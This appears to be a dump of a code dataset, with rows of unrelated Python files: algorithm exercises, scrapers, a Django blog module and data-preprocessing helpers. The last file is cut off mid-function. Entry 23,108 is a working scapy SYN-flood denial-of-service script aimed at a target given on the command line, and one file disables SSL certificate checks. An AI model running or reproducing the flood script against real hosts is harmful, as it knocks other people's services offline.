index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
23,100 | a5ecd1c97f54dbab3f1500677c6230da91ce45ad | """
There are some processes that need to be executed. Amount of a load that process causes on a server that runs it, is being represented by a single integer. Total load caused on a server is the sum of the loads of all the processes that run on that server. You have at your disposal two servers, on which mentioned processes can be run. Your goal is to distribute given processes between those two servers in the way that, absolute difference of their loads will be minimized.
Given an array of n integers, of which represents loads caused by successive processes, return the minimum absolute difference of server loads.
Example 1:
Input: [1, 2, 3, 4, 5]
Output: 1
Explanation:
We can distribute the processes with loads [1, 2, 4] to the first server and [3, 5] to the second one,
so that their total loads will be 7 and 8, respectively, and the difference of their loads will be equal to 1.
"""
# maximise one to be the half of total
def solution(processes):
max_load = sum(processes)
total = max_load // 2
dp = [[0 for i in range(len(processes))] for j in range(total)]
for i in range(1, total + 1):
if i >= processes[0]:
dp[i-1][0] = processes[0]
for idx, item in enumerate(processes):
for w in range(2, total+1):
if w-1 < item:
dp[w-1][idx] = dp[w-1][idx-1]
else:
dp[w - 1][idx] = max(dp[w - 1][idx - 1], dp[w - item - 1][idx - 1] + item)
best = dp[total - 1][len(processes) - 1]
return max_load - 2*best |
23,101 | af4b704ec5d40ba64b56179b677176304e7e1922 | #!/usr/bin/python
def get_system_to_ip_map(system_names,system_ips):
""" Get lists of system names and system IPs
then prints the list of tuple which has system name
and corresponding system IP.
Args:
system_names: It is list of system names.
system_ips: It is list of system IPs
Returns:
Returns list of tuple having system name and
corresponding system IP.
If both the list or any one of the list is empty
this function returns empty list
If the two input argument is uneven length, the
list of tuples will be return with
length = min(len(system_names), len(system_ips))
"""
system_ip_map = []
if not system_names or not system_ips:
print "List is empty!!! Please enter some data"
return system_ip_map
system_no = min(len(system_names),len(system_ips))
for x in range (0,system_no):
system_ip_map += [(system_names[x],system_ips[x])]
return system_ip_map
_list = raw_input("Enter system names seperated by coma : ")
system_names = _list.split(',')
_list = raw_input("Enter system IPs seperated by coma : ")
system_ips = _list.split(',')
print get_system_to_ip_map(system_names, system_ips)
|
23,102 | 9e268a523c1d494d67223f70a36d9c50919eb1fc | #!/usr/bin/env python3
class SimpleContainsTest:
def __init__(self, data):
self.data = data
def __getitem__(self,i):
print('getitem: ', i)
return self.item[i]
def __iter__(self):
self.ix = 0
return self
def __next__(self):
if self.ix == 0: print('start iteration')
if self.ix == len(self.data):raise StopIteration
item = self.data[self.ix]
print('iter : ', end="")
self.ix +=1
return item
def __contains__(self,x):
print("contains:", end=' ')
return x in self.data
if __name__ == '__main__':
lin = SimpleContainsTest(['a','b','c','d','z'])
print('z' in lin)
for i in lin:
print(i, '|', end=' ') |
23,103 | d234140263026fff68b5dbf0e01263382de3390c |
def number_pairs(txt):
lst = list(map(int,txt.split(' ')))[1:]
C = [lst.count(i) for i in set(lst)]
return sum(x//2 for x in C)
|
23,104 | df5c6f4b7c6aa50aa5658167bbd643a8036e0bf7 | """
1425. Constrained Subsequence Sum
Hard
Given an integer array nums and an integer k, return the maximum sum of a non-empty subsequence of that array such that for every two consecutive integers in the subsequence, nums[i] and nums[j], where i < j, the condition j - i <= k is satisfied.
A subsequence of an array is obtained by deleting some number of elements (can be zero) from the array, leaving the remaining elements in their original order.
Example 1:
Input: nums = [10,2,-10,5,20], k = 2
Output: 37
Explanation: The subsequence is [10, 2, 5, 20].
Example 2:
Input: nums = [-1,-2,-3], k = 1
Output: -1
Explanation: The subsequence must be non-empty, so we choose the largest number.
Example 3:
Input: nums = [10,-2,-10,-5,20], k = 2
Output: 23
Explanation: The subsequence is [10, -2, -5, 20].
Constraints:
1 <= k <= nums.length <= 10^5
-10^4 <= nums[i] <= 10^4
"""
from typing import List
import collections
import heapq
"""
IF SKIP, then can skip k-1 consecutive elts
k=1: cannot have skips/holes.
k=2: can skip over 1 at a time
k=3: can skip over 2 at a time.
"""
###############################################################################
"""
Solution: DP w/ decreasing deque of positive values.
Same dp relations as in sol 2.
Size of deque is not necessarily always k.
O(n) time: each element is pushed and popped at most once.
O(n) extra space: for dp array
O(k) extra space: for deque
"""
class Solution:
def constrainedSubsetSum(self, arr: List[int], k: int) -> int:
n = len(arr)
# ... initialize dp[i] to be sum of arr[i] by itself.
# This is particularly important in case all array values are negative.
dp = arr[:]
q = collections.deque()
for i in range(n):
if q: # q[0] is the max of dp[j] for j in [i-k, i)
dp[i] += q[0]
# Maintain decreasing deque.
# dp[i] will be added to deque and it is newer than all other
# elements in the deque. Therefore, we can remove other values
# in the deque that are smaller than dp[i].
while q and dp[i] > q[-1]:
q.pop()
# ...
if dp[i] > 0:
q.append(dp[i])
# Don't need dp[i-k] in next iteration since it will be out of range.
if i >= k and q and q[0] == dp[i-k]:
q.popleft()
return max(dp)
"""
Solved it with DP between two positive numbers (mixture of stepping stairs
with sliding window (using multiset)) to find the element to go to such that
the negative cost is minimum. If negative cost > positive sum till now then
initialize the positive sum to 0 (Kadane's algorithm).
"""
###############################################################################
"""
Solution 2: DP w/ max heap.
Let dp[i] be the max constrained subset sum of elements up to index i,
with dp[i] necessarily including a[i]. Then
dp[i] = max(dp[j] + a[i]) = a[i] + max(dp[j]) for j in [i - k, i).
Hence we need to maintain the max of the last k computed dp elements.
It's easy with a max heap of pairs (dp[j], j).
Just remove the top if it is too old.
Alternatively, can find max dp in range using segment tree (range max query).
This results in same time complexity.
O(n log n) time
O(n) extra space: for dp array and heap
"""
class Solution2:
def constrainedSubsetSum(self, arr: List[int], k: int) -> int:
n = len(arr)
dp = arr[:] # ...
h = [] # max heap
for i in range(n):
# Remove max dp elements if their indices are not within the
# last k positions of current index i.
while h and h[0][1] < i - k:
heapq.heappop(h)
if h:
dp[i] = max(dp[i], arr[i] + h[0][0])
heapq.heappush(h, (dp[i], i))
return max(dp) # ...
###############################################################################
"""
Solution 3: DP with inner loop to find max of previous dp's within range k.
O(n*k) time
O(n) extra space: for dp array
TLE
"""
class Solution3:
def constrainedSubsetSum(self, arr: List[int], k: int) -> int:
n = len(arr)
dp = arr[:] # ...
for i in range(n):
start = max(i - k, 0) # don't let start index go below 0
for j in range(start, i):
dp[i] = max(dp[i], arr[i] + dp[j])
return max(dp) # ...
#return dp[-1] # doesn't work
###############################################################################
if __name__ == "__main__":
def test(arr, k, comment=None):
print("="*80)
if comment:
print(comment)
print(f"\narr = {arr}")
print(f"k = {k}")
res = sol.constrainedSubsetSum(arr, k)
print(f"\nres = {res}\n")
sol = Solution() # DP w/ decreasing deque of positive values
#sol = Solution2() # DP w/ max heap
#sol = Solution3() # DP with inner loop to find max of previous dp's within range k.
comment = "LC ex1; answer = 37"
arr = [10,2,-10,5,20]
k = 2
test(arr, k, comment)
comment = "LC ex2; answer = -1"
arr = [-1,-2,-3]
k = 1
test(arr, k, comment)
comment = "LC ex3; answer = 23"
arr = [10,-2,-10,-5,20]
k = 2
test(arr, k, comment)
|
23,105 | f7210ce4e412a632a8220fe8cdcb23ac827e43ce | def sum_2_num(num1, num2):
'''
对两个数字求和
:return:sum
'''
sum = num1 + num2
# 使用返回值, 告诉调用者函数执行的结果
return sum
# 使用变量 -- 接收函数的返回值
result = sum_2_num(50, 20)
print("计算结果为:%.2f" % result)
|
23,106 | fd1f58eb561ea52fc0c4c527b1f7d71a27cbaac6 | from django.shortcuts import redirect, get_object_or_404
from functools import wraps
from apps.projects.models import Task, Project, Discussion
def has_access_project(redirect_url=None, klass=None):
def decorator(function):
def _control(request, pk=None, *args, **kwargs):
if klass:
id_key = klass.__name__.lower() + '_id'
pk = pk or kwargs.get(id_key)
object = get_object_or_404(klass, pk=pk)
if klass == Project:
if object not in request.user.projects:
return redirect(redirect_url)
elif klass == Task or klass == Discussion:
if object.project not in request.user.projects:
return redirect(redirect_url)
return function(request, pk, object, *args, **kwargs)
return wraps(function)(_control)
return decorator |
23,107 | 5f4363e84f13c2e08caa29979355158642767afe | from random import randint
def maximum_pairwise_product(nums):
# Iterative solution
result = 0
# calculate maximum pairwise of multiplication
for i in range(len(nums)):
for j in range(i + 1, len(nums)):
# if new pair multiplication is greater than previous result
# then this block of code is work.
if nums[i] * nums[j] > result:
result = nums[i] * nums[j]
return result
def maximum_pairwise_product_fast(seq):
largest = float("-inf")
second_largest = float("-inf")
for elt in seq:
if elt > largest:
second_largest = largest
largest = elt
elif elt > second_largest:
second_largest = elt
return second_largest * largest
def main():
while True:
n = randint(2, 60)
nums = [randint(1,10000) for _ in range(n)]
# for _ in range(n):
# nums.append(randint(1,10000))
res1 = maximum_pairwise_product(nums)
res2 = maximum_pairwise_product_fast(nums)
print(n)
print(nums)
if res1 != res2:
print('Wrong!!!', res1, res2)
break
else:
print("Ok", res1, res2)
if __name__ == '__main__':
main()
|
23,108 | 737ef92aba03151b75ebd9b8bd0171f85f4291e4 | #! /usr/bin/env python
# Security in Computer Systems 2018 - SDU.
# Multiple port SYN Flood Attack.
# @CarlosViescasHuerta.
import sys
from scapy.all import *
# Establish source and target IPs from input arguments
src_ip = sys.argv[1]
dst_ip = sys.argv[2]
dst_port = int(sys.argv[3])
print ("Launching DoS to http://" + dst_ip + ":" + str(dst_port))
# Set counter
i = 0
try:
while True:
# Flood from multiple ports
for port in range(5001, 50000):
i = i + 1
# Set addresses and send packets
_ip = IP(src=src_ip, dst=dst_ip)
_tcp = TCP(sport=port, dport=dst_port)
packet = _ip / _tcp
send(packet, inter = .001)
# Print & Update
print ("Port: " + str(port) + ". Sent packet # " + str(i))
except KeyboardInterrupt:
print ("\n \n \n \n \n \n \n \n \n \n \n")
print ("SYN Flood interrupted. Total packets sent: " + str(i)) |
23,109 | 0889c76fd3c8a12fa361817a0ebb304e6ce48642 | import requests
from bs4 import BeautifulSoup
from cts.menu import Menu, Beer
BASE_URL = "http://www.dryhopchicago.com/drink/beer/"
def get_menu_html():
return requests.get(BASE_URL)
def parse_menu_html(html):
soup = BeautifulSoup(html.content, "lxml")
menu = soup.find("div", {"class": "menu-content"})
update_date = menu.find("span").find("strong").get_text().split(" ")[-1]
beer_list = soup.find("ul", {"id": ""})
beers = beer_list.find_all("li")
beers.pop()
beers = parse_beers(beers)
return Menu(update_date, beers)
def parse_beers(beer_list):
beers = []
for item in beer_list:
name = item.find("h3").get_text().strip()
info = item.findAll("p")
style = info[0].get_text().split("—")[0]
abv = info[0].get_text().split("—")[1]
desc = info[1].get_text()
beers.append(Beer(name, style, abv, desc))
return beers
def get_menu():
html = get_menu_html()
return parse_menu_html(html)
|
23,110 | 54d285a54066a8b9bfc6e90e10acceb12a6d35fe | import sqlite3
import ssl
import urllib.request, urllib.parse, urllib.error
# Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
conn = sqlite3.connect('bkfood.sqlite')
cur = conn.cursor()
cur.execute('''
CREATE TABLE IF NOT EXISTS Food (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
item TEXT,
serving_size INTEGER,
calories FLOAT,
fat_cal FLOAT,
protein FLOAT,
fat FLOAT,
sat_fat FLOAT,
trans_fat FLOAT,
chol FLOAT,
sodium FLOAT,
carbs FLOAT,
fiber FLOAT,
sugar FLOAT,
meat INTEGER);''')
fh = open("burger-king-items.txt")
print('Loading BK Items into database')
for line in fh:
if line.startswith('Item'): continue
words = line.split()
item = words[0]
serving_size = words[1]
calories = words[2]
fat_cal = words[3]
protein = words[4]
fat = words[5]
sat_fat = words[6]
trans_fat = words[7]
chol = words[8]
sodium = words[9]
carbs = words[10]
fiber = words[11]
sugar = words[12]
meat = words[13]
if serving_size is None or calories is None or fat_cal is None or protein is None or fat is None or sat_fat is None or trans_fat is None or chol is None or sodium is None or carbs is None or fiber is None or sugar is None or meat is None : continue
cur.execute('''INSERT OR IGNORE INTO Food (item, serving_size, calories, fat_cal, protein, fat, sat_fat, trans_fat, chol, sodium, carbs, fiber, sugar, meat)
VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ? )''', (item, serving_size, calories, fat_cal, protein, fat, sat_fat, trans_fat, chol, sodium, carbs, fiber, sugar, meat ))
print('Items loaded successfully into database')
conn.commit()
cur.close()
|
23,111 | 05c84dc2169d5f2f83a2a44e5ed282afce22e144 | from django import forms
from django.utils.safestring import mark_safe
from sphene.community.middleware import get_current_user, get_current_sphdata, get_current_urlconf
from sphene.community.sphutils import sph_reverse
from sphene.community.models import Tag, TagLabel, TaggedItem, tag_set_labels, tag_get_labels
from sphene.community.fields import TagField
from sphene.community.widgets import TagWidget
from sphene.sphboard.models import Post
from sphene.sphboard.views import PostForm
from sphene.sphboard.categorytyperegistry import CategoryType, register_category_type
from sphene.sphblog.models import BlogPostExtension, BLOG_POST_STATUS_CHOICES, BlogCategoryConfig
from sphene.sphblog.utils import slugify
class BlogPostForm(PostForm):
slug = forms.CharField(required = False,
help_text = "Optionally define a slug for this blog post. Otherwise it will be filled automatically.")
status = forms.ChoiceField(choices = BLOG_POST_STATUS_CHOICES,
initial = 2)
tags = TagField(model = Post, required = False)
def clean_slug(self):
if not 'subject' in self.cleaned_data:
raise forms.ValidationError( 'No subject to generate slug.' )
slug = self.cleaned_data['slug']
if slug == '':
slug = slugify(self.cleaned_data['subject'], model=BlogPostExtension)
else:
slug = slugify(slug, model=BlogPostExtension, pk=self.__ext_id)
return slug
def init_for_category_type(self, category_type, post):
self.__ext_id = None
super(BlogPostForm, self).init_for_category_type(category_type, post)
if post:
try:
ext = post.blogpostextension_set.get()
self.__ext_id = ext.id
self.fields['tags'].initial = tag_get_labels(post)
self.fields['slug'].initial = ext.slug
self.fields['status'].initial = ext.status
except BlogPostExtension.DoesNotExist:
# This can happen after post was created for
# attaching a file.. which wouldn't create a BlogPostExtension.
pass
class BlogCategoryType(CategoryType):
name = "sphblog"
label = "Blog Category"
def get_post_form_class(self, replypost, editpost):
if replypost is not None and \
(editpost is None or editpost.thread is not None):
# If we are posting a reply, use the default PostForm
return PostForm
return BlogPostForm
def save_post(self, newpost, data):
super(BlogCategoryType, self).save_post(newpost, data)
if newpost.thread is not None:
return
try:
ext = newpost.blogpostextension_set.get()
except BlogPostExtension.DoesNotExist:
ext = BlogPostExtension( post = newpost, )
ext.slug = data['slug']
ext.status = data['status']
ext.save()
tag_set_labels( newpost, data['tags'] )
if newpost.is_new_post:
try:
config = BlogCategoryConfig.objects.get( \
category = self.category)
if config.enable_googleblogping:
# If enabled, ping google blogsearch.
import urllib
url = self.category.group.get_baseurl()
blog_feed_url = sph_reverse('sphblog-feeds', urlconf=get_current_urlconf(), kwargs = { 'category_id': self.category.id })
pingurl = 'http://blogsearch.google.com/ping?%s' % \
urllib.urlencode( \
{ 'name': self.category.name,
'url': ''.join((url, self.category.get_absolute_url()),),
'changesURL': ''.join((url, blog_feed_url),) } )
urllib.urlopen( pingurl )
except BlogCategoryConfig.DoesNotExist:
pass
def get_absolute_url_for_post(self, post):
return post.get_thread().blogpostextension_set.get().get_absolute_url()
def append_edit_message_to_post(self, post):
return post.thread is not None
def get_show_thread_template(self):
return 'sphene/sphblog/show_blogentry_layer.html'
def get_absolute_url_for_category(self):
try:
blog_url = sph_reverse('sphblog_category_index_slug', kwargs = { 'category_slug': self.category.slug })
return blog_url
except Exception as e:
#print "err.. argl %s" % str(e)
return None
class HiddenBlogCategoryType(BlogCategoryType):
name = "sphbloghidden"
label = "Blog Category hidden from forum overviews"
def is_displayed(self):
return False
|
23,112 | a1a49ac0c2abbd0a67158164cb194bf0c11f97b8 |
def prime(x):
if x <= 1:
return False
elif x == 2:
return True
else:
for n in range(2,x):
if (x%n)==0:
return False
break
else:
continue
return True
n=int(input())
d=[]
count =0
while n != 0:
d.append(n)
if n == 0 :
break
else:
n = int(input())
continue
for i in range(len(d)):
for j in range(i, i*2+1):
if prime(d[i]) == True:
count+=1
else:
continue
print(count)
|
23,113 | 87115a99b027a58ab7ae385aaa4d0edbb37cc05e | from selenium import webdriver
import time
import re
import os
from bs4 import BeautifulSoup
import pyautogui
import pyperclip
from lxml import etree
import datetime
import requests
from selenium.common.exceptions import TimeoutException
class Crawl_141jav:
def main(self, Dir='F:\\pic\\141jav\\', startTime= datetime.date.today()):
#custom_path = 'F:\\pic\\141jav\\'
custom_path = Dir
url = 'https://www.141jav.com/date/'
header = {
'authority': 'pics.dmm.co.jp: method: GET: path: / mono/movie/adult/h_283pym342/h_283pym342pl.jpg: scheme: https', 'accept': 'text/html, application/xhtml+xml, application/xml;q = 0.9, image/webp, image/apng, */*;q = 0.8, application/signed-exchange;v = b3;q = 0.9', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'zh-CN, zh;q = 0.9', 'cache-control': 'max-age = 0', 'cookie': 'app_uid = ygb2Cl7o451QgzBdxXNMAg ==', 'if-modified-since': 'Mon, 11 May 2020 07: 05: 40 GMT', 'if-none-match': "5eb8f944-34473", 'referer': 'https: // www.141jav.com/date/2020/06/16?page = 1', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'none', 'sec-fetch-user': '?1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0 Win64 x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36'
}
chrome_opts = webdriver.ChromeOptions()
chrome_opts.add_argument("--headless")
chrome_opts.add_experimental_option('excludeSwitches', ['enable-logging'])
def timeCount(flag, EndTime='2014/6/6'):
timeList = []
begin = datetime.date(2014, 6, 25)
if flag == 0:
year = int(EndTime.split('/')[0])
month = int(EndTime.split('/')[1])
date = int(EndTime.split('/')[2])
end = datetime.date(year, month, date)
else:
end = datetime.date.today()
for i in range((end - begin).days+1):
day = begin + datetime.timedelta(days=(end - begin).days-i)
timeList.append(str(day).replace("-", "/"))
return timeList
def scrapy():
if startTime == datetime.date.today():
timeList = timeCount(1)
else:
timeList = timeCount(0,startTime)
driver = webdriver.Chrome(options=chrome_opts)
Exist = []
if os.path.exists(custom_path + 'history.txt'):
with open(custom_path + 'history.txt','r+') as f:
lines = f.readlines()
for line in lines:
Exist.append(line.replace("\n",""))
f.close()
for date in timeList:
try:
driver.set_page_load_timeout(10)
while True:
try:
driver.get(url+date)
break
except TimeoutException:
print("加载超时,启动F5刷新,等待3秒")
# pyautogui.click(x=509, y=33)
# pyautogui.hotkey('f5')
# driver.get(url+date)
driver.refresh()
time.sleep(3)
if not os.path.exists(custom_path):
os.mkdir(custom_path)
if not os.path.exists(custom_path+date.replace('/','-')+'\\'):
os.mkdir(custom_path+date.replace('/', '-')+'\\')
videoNumber = 0
for page in range(100):
try:
driver.set_page_load_timeout(10)
while True:
try:
driver.get(url+date+'?page='+str(page+1))
break
except TimeoutException:
print("加载超时,启动F5刷新,等待3秒")
# pyautogui.click(x=509, y=33)
# pyautogui.hotkey('f5')
driver.refresh()
time.sleep(3)
content = driver.page_source.encode('utf-8')
html = etree.HTML(content)
soup = BeautifulSoup(content, 'lxml')
href = [x.attrib['src'] for x in html.xpath("//img[@class='image']")]
videoNumber += len(href)
if len(href) == 0:
print("%s 共 %d 部片!" % (date, videoNumber))
break
name = [x.text.replace("\n", "") for x in html.xpath(
"//h5[@class='title is-4 is-spaced']/a")]
driver_info = webdriver.Chrome(options=chrome_opts)
for i in range(len(href)):
if name[i] in Exist:
print('%s 已经存在!' % (name[i]))
continue
driver_info.get(href[i])
img = driver_info.find_element_by_xpath("//html/body/img")
img.screenshot(custom_path + date.replace('/', '-')+'\\' + name[i] + '.jpg')
# pyautogui.rightClick(x=500, y=500)
# pyautogui.typewrite(['V'])
# time.sleep(2)
# pyperclip.copy(custom_path + date.replace('/', '-')+'\\' + name[i] + '.jpg')
# pyautogui.hotkey('ctrlleft', 'V')
# time.sleep(1)
# pyautogui.press('enter')
# time.sleep(1)
# while True:
# try:
# r = requests.get(href[i], headers=header)
# r.raise_for_status()
# break
# except:
# print("超时异常")
# with open(date.replace('/', '-')+'\\' + name[i] + '.jpg', 'wb') as f:
# f.write(r.content)
# f.close()
while True:
filelist = os.listdir(custom_path+date.replace('/', '-')+'\\')
if name[i] + '.jpg' in filelist:
with open(custom_path + 'history.txt', 'a+') as f:
f.writelines(name[i])
f.writelines('\n')
f.close()
print("%s 下载完成!" % (name[i]))
break
else:
print("等待响应")
time.sleep(2)
# pyautogui.hotkey('ctrlleft', 'V') # 粘贴
# time.sleep(1)
# pyautogui.press('enter') # 确认
# time.sleep(1)
# print("没看到文件")
time.sleep(0.5)
driver_info.quit()
except:
print("%s 共 %d 页结束!" % (date, page+1))
break
except:
print("%s 还未发布!"%(date))
continue
scrapy()
|
23,114 | b9943830cb5f1e9f0667d8d6fccc3b2f06e14cb1 | '''
Script implements several preprocessing and evaluation steps that have to be done for the triplet loss network
'''
## Imports
import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
from tqdm import tqdm
from sklearn.model_selection import train_test_split
from sklearn.metrics import plot_confusion_matrix
from sklearn.metrics import balanced_accuracy_score, precision_score, recall_score, f1_score, classification_report, confusion_matrix, roc_curve, auc
from sklearn.preprocessing import OrdinalEncoder
from collections import Counter
def tackle_distribution_shift(data:pd.DataFrame, approach:str = "reuse") -> pd.DataFrame:
'''
function to balance the appearance of samples from different classes -> tackle distribution shift
Parameters:
- data: data with distribution shift [pandas.DataFrame]
- approach: strategy to tackle the distribution shift. Possible values are [String]
- reusing minor class samples --> 'reuse' = default
- mixing both approaches by using the size of the median common class --> "mix"
- constraining the number of major class samples --> 'constrain'
Returns:
- df: data without distribution shift [pandas.DataFrame]
'''
## make sure not to overwrite given data
df = data.copy()
## get all labels that exist
labels = data.loc[:, "Label"]
## get appearances of each label
counted_labels = Counter(labels).most_common()
## get max num of samples (valid for all classes)
if approach == "reuse":
## take appearance value of most common label
sample_size = counted_labels[0][1]
elif approach == "mix":
sample_size = counted_labels[int(counted_labels.__len__()*0.5)][1]
elif approach == "constrain":
## take appearance value of least common label
sample_size = counted_labels[-1][1]
else:
print("approach not implemented (yet)! Using 'resue' instead!")
## take appearance value of most common label
sample_size = counted_labels[0][1]
## take a 'subset' or 'superset' of every class
sampled_data = [df[df.Label == label].sample(n = sample_size, replace = True) for label in np.unique(labels)]
## return merged data
return pd.concat(sampled_data).reset_index(drop = True)
def encode_objects(data:pd.DataFrame, ignore_columns:list = [], how:str = "binarizer") -> pd.DataFrame:
'''
goes through given dataset, encodes all object columns into numerical data
Parameters:
- data: DataFrame to anaylse [pandas.DataFrame]
- ignore_columns: List of columns that shall be ignored [List, default = []]
- how: strategy to encode. The following are possible [String]
- Binarize: every unique value gets own column, filled with 0's and 1's, using pandas.get_dummies() --> 'binarizer' = Default
- OrdinalEncoder: unique values get replaced by increasing number (same amount of features) using sklearn's OrdinalEncoder --> 'ordinal'
Returns:
- encoded_data: encoded DataFrame [pandas.DataFrame]
'''
## make sure not to overwrite given data
df = data.copy()
## check if data is pandas.DataFrame
if not type(df) == pd.DataFrame:
if type(df) == pd.Series:
df = pd.DataFrame(data)
df.columns = ["Series_Data"]
else:
print("data is no pandas.DataFrame, cannot be further processed")
return df
## remaining columns that shall be checked (all - ignore_columns)
columns = list(set(df.columns) - set(ignore_columns))
## define possible strategies
if how == "binarizer":
strategy = lambda x: pd.get_dummies(x)
elif how == "ordinal":
enc = OrdinalEncoder()
strategy = lambda x: pd.DataFrame(enc.fit_transform(x), columns = x.columns)
else:
print("strategy not implemented (yet!). Using pandas.get_dummies() instead!")
strategy = lambda x: pd.get_dummies(x)
cols = []
## go through all remaining columns, check if 'object' features exist
for column in columns:
if pd.api.types.is_string_dtype(df[column]):
cols.append(column)
## get all other columns from data
other_columns = list(set(df.columns) - set(cols))
## get both subdatasets - the encoded one and the remaining original one
encoded_data_raw = strategy(df[cols])
data_raw = df[other_columns]
## merge both subdatasets
encoded_data = pd.concat([encoded_data_raw, data_raw], axis = 1)
return encoded_data
def check_nan(data:pd.Series) -> bool:
'''
checks whether given data contains NaN's
Parameters:
- data: data to check [pandas.Series], can also be pandas.DataFrame
Returns:
- nan's: True, if data contains NaN's, otherwise False [Boolean]
'''
## make sure not to overwrite given data
df = data.copy()
if (not type(df) == pd.DataFrame) and (not type(df) == pd.Series):
print("data is no pandas.DataFrame, no check for NaN's done")
return False
if type(df) == pd.DataFrame:
return data.isna().sum().sum().astype(bool)
return data.isna().sum().astype(bool)
def add_nan(data:pd.DataFrame, amount:float = 0.05) -> pd.DataFrame:
'''
taking the given DataFrame and randomly adds the given amount of NaN's into it
Parameters:
- data: given data to add NaN's to [pandas.DataFrame]
- amount: desired amount of NaN's [Float, default = 0.05]
Returns:
- nan_data: data containing desired amount of NaN's [pandas.DataFrame]
'''
## set a numpy array with <amount> number of `True`s in the shape of data
nan_array = np.random.random(data.shape) < amount
## mask every element in 'data' with an NaN, when that element in 'nan_array' is set to True
nan_data = data.mask(nan_array)
return nan_data
def check_numeric(data:pd.DataFrame, ignore_columns:list = []) -> pd.DataFrame:
'''
function that converts all columns in DataFrame into numeric ones. Deletes all columns where `pandas.to_numeric()` fails (as they seem to be Strings)
Parameters:
- data: DataFrame with all different kinds of column types [pandas.DataFrame]
- ignore_columns: List of columns that shall be ignored [List, default = []]
Returns:
- df: DataFrame with converted columns and without deleted columns [pandas.DataFrame]
'''
## make sure not to overwrite given data
df = data.copy()
## check if data is pandas.DataFrame
if not type(df) == pd.DataFrame:
if type(df) == pd.Series:
num_df = pd.to_numeric(df, errors = "coerce")
if num_df.isna().sum() > 0:
print("data cannot be converted to numerical data, you have to encode it")
return df
return num_df
print("data is no pandas.DataFrame, cannot be further processed")
return df
## remaining columns that shall be checked (all - ignore_columns)
columns = list(set(df.columns) - set(ignore_columns))
## iterate over all columns, convert them to numeric ones (float or int)
for col in tqdm(columns, desc="make all columns numerical"):
## if error, then fill with NaN
df[col] = pd.to_numeric(df[col], errors="coerce")
## drop all columns that contain NaN's
df = df.dropna(axis=1)
return df
def iter_columns(data:pd.DataFrame, columns:list, trait:str) -> str:
'''
iterator, going over all columns in DataFrame, checking their content for desired trait
Parameters:
- data: DataFrame to iterate over [pandas.DataFrame]
- columns: columns to check [List]
- trait: what shall the column be checked for. Possible values [String]
- Unique: check for unique values per column, returns columns consisting of the same value over all samples --> 'unique'
Returns:
- col: column that contains only one different value [String]
'''
## iterate over all given columns
for col in tqdm(columns, desc=f"handle {trait}'s'"):
## check for Unique's
if trait == "unique":
## check if column contains more than one different value
if data[col].unique().__len__() == 1:
## if yes, return that column
yield col
def handle_nans(data:pd.DataFrame, strategy:str = "null", ignore_columns:list = []) -> pd.DataFrame:
'''
function that drops all columns (=features) that only contain one different value
Parameters:
- data: DataFrame [pandas.DataFrame]
- strategy: strategy to fill in the dataset. Possible values are [String]
- 0: fill all with Zero --> 'null' = default
- Mean: fill all with mean of respective feature --> 'mean'
- Median: fill all with median of respective feature --> 'median'
- Max: fill all with max of respective feature --> 'max'
- Min: fill all with min of respective feature --> 'min'
- ignore_columns: List of columns that shall be ignored [List, default = []]
Returns:
- df: DataFrame without deleted columns [pandas.DataFrame]
'''
## make sure not to overwrite given data
df = data.copy()
## check if data is data contains NaN's
if not check_nan(df):
print("no NaN's inside data")
return df
## remaining columns that shall be checked (all - ignore_columns)
columns = list(set(df.columns) - set(ignore_columns))
## init columns to drop
cols = []
## check strategy, calculate filling value(s)
if strategy == "null":
value = [0 for _ in range(columns.__len__())]
elif strategy == "mean":
value = df[columns].mean()
elif strategy == "median":
value = df[columns].median()
elif strategy == "min":
value = df[columns].min()
elif strategy == "max":
value = df[columns].max()
else:
print("strategy not implemented (yet). Filling with 0")
value = [0 for _ in range(columns.__len__())]
df = df.fillna(dict(zip(columns, value)))
## drop columns that ONLY contain NaN's, no matter what 'ignore_columns' says
df = df.dropna(how = "all", axis = 1)
return df
def handle_uniques(data:pd.DataFrame, ignore_columns:list = []) -> pd.DataFrame:
'''
function that handles all columns (=features) that only contain one different value by dropping them --> they do not contain helpful (any) information
Parameters:
- data: DataFrame [pandas.DataFrame]
- ignore_columns: List of columns that shall be ignored [List, default = []]
Returns:
- df: DataFrame without deleted columns [pandas.DataFrame]
'''
## make sure not to overwrite given data
df = data.copy()
## check if data is pandas.DataFrame
if not type(df) == pd.DataFrame:
print("data is no pandas.DataFrame, cannot be further processed")
return df
## remaining columns that shall be checked (all - ignore_columns)
columns = list(set(df.columns) - set(ignore_columns))
## init columns to drop
cols = []
## make sure not to overwrite given data
df = data.copy()
for col in iter_columns(df, columns, "unique"):
cols.append(col)
df = df.drop(cols, axis=1)
return df
def drop_features(data:pd.DataFrame, columns:list = []) -> pd.DataFrame:
'''
function that drops all columns are given by `columns`
Parameters:
- data: DataFrame with time columns [pandas.DataFrame]
- columns: List of columns that shall be deleted [List, default = []]
Returns:
- df: DataFrame without deleted columns [pandas.DataFrame]
'''
## make sure not to overwrite given data or the given columns
cols = columns.copy()
df = data.copy()
## check if data is pandas.DataFrame
if not type(df) == pd.DataFrame:
print("data is no pandas.DataFrame, cannot be further processed")
return df
df = df.drop(cols, axis=1)
return df
def flatten(X:np.array) -> np.array:
'''
flattens a 3D array into 2D array
Parameters:
- X: a 3D array with shape samples x width x height [numpy.array]
Returns:
- flattened_X: 2D array with shape sample x width*height [numpy.array]
'''
flattened_X = X.reshape(X.shape[0], -1)
return flattened_X
def iter_scale(X:np.array, scaler:object) -> np.array:
'''
iterates over fiven X, scales given 3D array using given (trained) scaler
Parameters:
- X: 3D array with shape samples x length x features [numpy.array]
- scaler: scaler object, e.g., sklearn.preprocessing.StandardScaler, sklearn.preprocessing.normalize [object]
Returns:
- scaled_X: scaled 3D array of same shape [numpy.array]
'''
## copy X to make sure not to overwrite the original data
